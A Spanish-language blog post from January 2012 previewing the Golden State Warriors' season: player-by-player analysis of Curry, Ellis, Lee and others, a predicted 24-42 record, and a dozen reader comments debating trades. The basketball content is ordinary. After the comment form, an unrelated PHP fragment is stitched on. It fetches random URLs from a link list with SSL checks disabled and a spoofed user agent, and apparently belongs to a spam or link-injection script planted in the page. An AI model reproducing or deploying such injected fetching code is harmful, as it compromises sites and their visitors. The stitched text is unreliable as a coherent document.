Golden State Warriors: Las llanuras del tránsito

12 de January de 2012 por Sancho88

Sí, es uno de los títulos de la prestigiosa serie “Los Hijos de la Tierra” de la escritora Jean Marie Auel, pero viene de perlas para resumir lo que es este equipo actualmente. Se trata de un conjunto joven en clara reconstrucción, que busca reinventarse en una liga demasiado competitiva para la escasez de efectivos de calidad con los que cuentan entre sus filas. Pocas posibilidades ofrecen los de la bahía de San Francisco. La falta de profundidad de su plantilla lastra mucho el juego del equipo que ya no es aquel rodillo torturador que siempre pasaba de los 100 puntos no hace mucho tiempo. Les falta frescura y la principal razón es la gran dependencia que tienen de su trío de mejores jugadores: Stephen Curry, Monta Ellis y David Lee. Ellos marcarán todas las posibilidades de dar la gran sorpresa y meterse en los Playoffs en el Oeste. De momento, la baja por lesión de Curry, que forzó más de la cuenta en el inicio de temporada después de una complicada operación de tobillo, está suponiendo un trastorno importante para la franquicia del puente rojo y complica sus posibilidades de hacer un buen papel. De su recuperación, que aún no está claro para cuando se espera, depende la evolución del equipo esta temporada pero los malos inicios se suelen pagar en una liga que no perdona el más mínimo descuido.

En ausencia de Stephen Curry, Monta Ellis está siendo el líder ofensivo del equipo y promedía más de 24 puntos y 8 asistencias pero con unos porcentajes bastante bajos (41% en tiros de dos y 23% en triples). Juega más minutos que nadie y acapara gran parte del juego del equipo. Si Curry vuelve en condiciones, sus porcentajes mejorarán a su lado, pues seleccionará mejor sus tiros jugando como escolta, su posición natural. A priori, el puesto de base tiene a Nate Robinson como recambio de lujo. Estaba sin equipo y los Warriors le llamaron en cuanto se confirmó la lesión de su base titular. Nate puede aportar buen lanzamiento exterior y velocidad al contraataque. Aunque actualmente se reparte la dirección con Monta Ellis, ninguno de ellos es un director clásico. Más bien, dan el perfil de escoltas tiradores. Incluso el propio Nate, a pesar de su altura.

El tercer pilar del equipo es David Lee que el año pasado firmó el contrato más elevado del equipo, 80 millones por 6 años. Con ese contrato se le debe exigir casi como a un  jugador franquicia. En la cancha ofrece garantías de sobra en la zona, promediando cerca de 17 puntos y 10 rebotes, números de All-Star en la Conferencia Este. Sin embargo, tiende a evaporarse de los partidos, dando una sensación alta de frialdad. Su entrenador, Mark Jackson, debe conseguir que se implique más defensa y que lidere al equipo en este apartado en consecuencia con la nueva filosofía que les está intentando transmitir a sus jugadores. El problema viene de la pareja acompañante. Andris Biedrins, que lleva en el equipo ya 8 temporadas podría optar con facilidad al cargo de presidente del club ‘Se dejaba llevar’ y está permanentemente bajo sospecha por su falta de regularidad y sobretodo, sangre. Para paliar este problema los Warriors se han traído este año a un viejo conocido, Kwame Brown. El año pasado no cuajó una mala temporada en Charlotte (eso sí, muy lejos de lo esperado para todo un nº 1 del draft) y eso le valió para firmar por 1 año los Warriors a cambio de 7 millones de dólares. Suponemos que el precio se incrementó al no querer ofrecerle más años de contrato. De momento, su aportación está siendo correcta, sin más.

Completaría el equipo Dorrell Wright que el año pasado logró el récord histórico de triples de la franquicia en una sola temporada (194) superando el anterior registro de Jason Richardson, y fue nombrado tercer mejor jugador en el ranking MIP (Most Improved Player). Sin embargo, esta temporada está dejando en ‘flor de un día’ ese alto puesto como uno de los jugadores más evolucionados y sus actuaciones están dejando demasiado que desear tal vez por falta de adaptación a los nuevos sistemas.

Entre las brumas se alza la gran esperanza, Klay Thompson. Tiene mucho potencial este alero de Washington State. De momento apenas pasa de los 5 puntos por partido pero con la baja de Curry ha asumido más carga ofensiva y ya ha completado partidos por encima de los 10 puntos. Tiene una mecánica de tiro fluída y sabe defender. Ahora necesita minutos para crecer.

Y poco más que destacar en una plantilla corta de talento. Incorporaron en pretemporada a un tirador de rachas como Brandon Rush, vía Indiana Pacers, que de momento está resultando una agradable sorpresa. Cuenta también con el alero Dominic McGuire, que firmó en pretemporada como agente libre, el base Ishmael Smith, que procede de los Memphis Grizzlies, y el alero ‘sophomore’ Ekpe Udoh, que teóricamente aporta defensa e intensidad, pero que no ha visto progresar ni sus habilidades técnicas ni su participación en el equipo con respecto a la pasada temporada. Estamos hablando de jugadores muy marginales dentro de la liga, que claramente no dan el nivel.

Para entender la situación de esta franquicia y su plantilla hemos de recordar que la temporada pasada los Warriors fueron vendidos por 450 millones de dólares a un grupo de empresarios que gestionan diferentes negocios en el mundo de la televisión, prensa rosa, el cine, la especulación en sectores estratégicos (tristemente, un método eficaz de ganarse la vida en nuestros días) y son expertos en gestión deportiva.  Heredan un equipo poco viable económicamente debido a las malas artes del anterior mandatario, Chris Cohan, que en 16 años solo ha visto a su equipo clasificarse una vez para Playoffs. Eso sí, aquello sí que fue un espectáculo. ¿Os acordáis del “We believe!” que eliminó a los Mavs en 2007 de la mano de un increíble Baron Davis? Los nuevos dueños tienen ante sí el reto de construir un equipo de futuro (más les vale después de la pasta que se han gastado, y que sea viable económicamente hablando. Que no os extrañe si durante la temporada arrecían los rumores de traspaso para Monta Ellis o de movimientos de cara a hacer un intento por hacerse con “Supermán” Howard en verano.

De momento, se encuentran atravesando una llanura muy extensa, tan grande como todo el continente norteamericano, que recorren noche tras noche en busca de su identidad. Nadie puede negar que Warriors es una marca asociada actualmente a un estilo determinado. Aquí un servidor aún recuerda la madrugada del 12 de marzo de este mismo año, cuando muchos incrédulos nos quedamos extasiados frente a nuestros ordenadores en un partido que bautizamos por aquí como ‘La orgía de puntos’. Aquella noche los Warriors recuperaron toda su magia, y en un pique de récord contra los Magic, se fueron hasta los 36 triples entre ambos equipos. Una noche irrepetible que jamás olvidaremos. Ahora, Jackson les pide defensa y a pesar de que el equipo está en fase beta ya están aprendiendo a luchar los partidos en el Oeste a pocos puntos contra huesos duros de roer, pero quizá ese no sea el estilo de sus jugadores. Parecen un equipo, metafóricamente hablando, de zurdos convencidos, que quieren convertir en diestros por la fuerza. Les queda un largo camino, al menos tan largo como el de Jondalar y Ayla siguiendo la orilla del Danubio.

Quinteto: Stephen Curry, Monta Ellis, Dorrell Wright, David Lee, Andris Biedrins.
6º hombre: Klay Thompson.

Previsión: Fuera de Playoffs (24-42).

Comenta

12 comentarios a esta entrada

  1. Sancho88 dice:
    #1

    He de decir que el análisis es mío, pero Txusma se lo ha currao, porque verdadermente resumir mis parrafadas, mis salidas metafóricas de contexto, que me pongo a hablar del precio del bacalao en guinea ecuatorial los lunes por la mañana… tiene un mérito muy grande, xd.

      Citar

  2. TheDeerHunter dice:
    #2

    Si está firmado por ti, Sancho… ya sabíamos que era tuyo 😉

      Citar

  3. Sancho88 dice:
    #3

    ya ya, pero aclaro el trabajo de Txus como corrector. Si veis los parafraseos, metáforas, idas de ollá y demás que aparecían en el original… era para echarse a temblar, jeej

      Citar

  4. Txusma dice:
    #4

    Al editor ni se le menta… El mérito es del que deja el material. El resto son ligeros retoques.

      Citar

  5. portu dice:
    #5

    A mi me han gustado las idas de olla, parafraseos y demás, je,je… y además coincido en el análisis, equipo muy justo de calidad, equipo sin mentalidad y además es q parece q no se locreen lo q están haciendo… a nivel de posiciones es sangrante el juego interior, de lo más flojo del Oeste y de toda la liga, sobretodo defensivamente. Una lástima pq S. Curry es canela fina y encajaría en casi cualquier equipo de la liga a la perfección y Monta Ellis tb es un anotador espectacular… con 2 tíos bien buscados, aunque no fuesen estrellas podrían convertirse en un gran quinteto. La elección de Udoh me temo q ya podemos ponerlo como gran cagada de su draft.

      Citar

  6. RSB dice:
    #6

    Buen análisis de otro de los tantos equipos en esta liga con mucha capacidad de anotación exterior y con problemas graves en la pintura, además de poco bagaje defensivo. Lo de Biedrins es desesperante, y Wright no está respondiendo como el año pasado… No tienen mucha cosa para rotar, aunque Rush les cayó como un regalo del cielo. Aún así son un hueso duro con el tridente que tienen, si Curry acorta plazos, los veo bastante mejor que el récord que pronosticáis. Podrían luchar por el octavo puesto.

      Citar

  7. melo15 dice:
    #7

    Yo estoy de acuerdo con RSB no los veo peor que los Spurs (en temporada regular) y yo creo que howard encajaria superbien en este equipo, pero que venga como agente libre, que si no tendran que soltar a Lee, Curry o Ellis

      Citar

  8. Esteban dice:
    #8

    Sancho88:
    He de decir que el análisis es mío, pero Txusma se lo ha currao, porque verdadermente resumir mis parrafadas, mis salidas metafóricas de contexto, que me pongo a hablar del precio del bacalao en guinea ecuatorial los lunes por la mañana… tiene un mérito muy grande, xd.

    es dificil estar en desacuerdo contigo cuando el analisis es sobre un equipo tan llano, predecible y aburrido, poco que agregar a tu analisis

    quiza hubiese hecho mencion de lo poco productivo que puede ser tener dos jugadores tan similares como curry y ellis, ambos anotadores del mismo tamaño, raro sinceramente que no hayan movido a ellis por un alero, quiza granger ya que los pacers tienen a george jugando de 2 cuando es 3 en realidad, y no hicieran una movida para repatriar a una vieja gloria como richarson para suplir a ellis, en cuanto a tiro estoy hablando

    su juego interior es malo pero como el de la mayoria de los equipos, otra cosa que se me ocurre es un movimiento de ellis a utha por jefferson, los jazz estan sobrados de pivotys a quienes deben darles minutos y les vendria bien un jugador franquicia como ellis, mientras sus jovenes se desarrollan, alli creo que mejorarian notablemente sus posibilidades

    hoy por hoy, no son un equipo que pueda quejarse de estar en el oeste, nisiquiera eso, no los veo nisiquiera en PO si jugaran en el este, creo que 1 MIAMI, 2 CHICAGO, 3 HAWKS, 4 BOSTON, 5 ORLANDO, 6 KNICKS, 7 76S, 8 PACERS, son todos superiores a ellos

    la otra que les queda es iniciar una reconstruccion fuerte, quiza les duela por q no tienen tan mal equipo, pero vienen asi durante años y no van a ningun lado…

    traspasar por rondas a ellis y regalar si puedan por algo util a LEE, y arrancar de 0, creo que seria horrible a corto plazo, lo que no quiere decir que lo que hay hoy por hoy no lo sea…

      Citar

  9. melo15 dice:
    #9

    Pues no estoy nada de acuerdo contigo Esteban
    Primero: los Warriors no son aburridos, porque casi siempre se van a los 100 puntos
    Segundo: los del traspaso a Ellis-Granger??? No les va nada bien, Ellis es mucho mas jugador que granger, si acaso por Granger i por un escolta.
    Tercero: los knicks son mejores que los Magic i los Celtics i que los Hawks.

      Citar

  10. Esteban dice:
    #10

    melo, cuando hablo del trade, no busco dos jugadores de igualk nivel, sino un traspaso q podria ser aceptado, y creo que ese podria haberlo sido, por otro lado no creo que ellis sea tanto mejor q granger, y por supuesto creo que granger encajaria mejor al lado de curry q ellis

    los 8 del este los fui poniendo como me fue saliendo, yo tampoco creo q los 76s vayan a terminar por sobre los pacers

      Citar

  11. rumbero dice:
    #11

    Tremendo el destrozo que les ha hecho Superman esta madrugada. 45 puntos 23 rebotes. Para mi que Howard se ha leído el análisis de Sancho antes el partido y ha visto claro que la defensa interior de GSW es de broma.

    PD: 39 tiros libres tirados!! De los que ha metido 21

      Citar

  12. melo15 dice:
    #12

    A vale gracias por la alcaracion.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>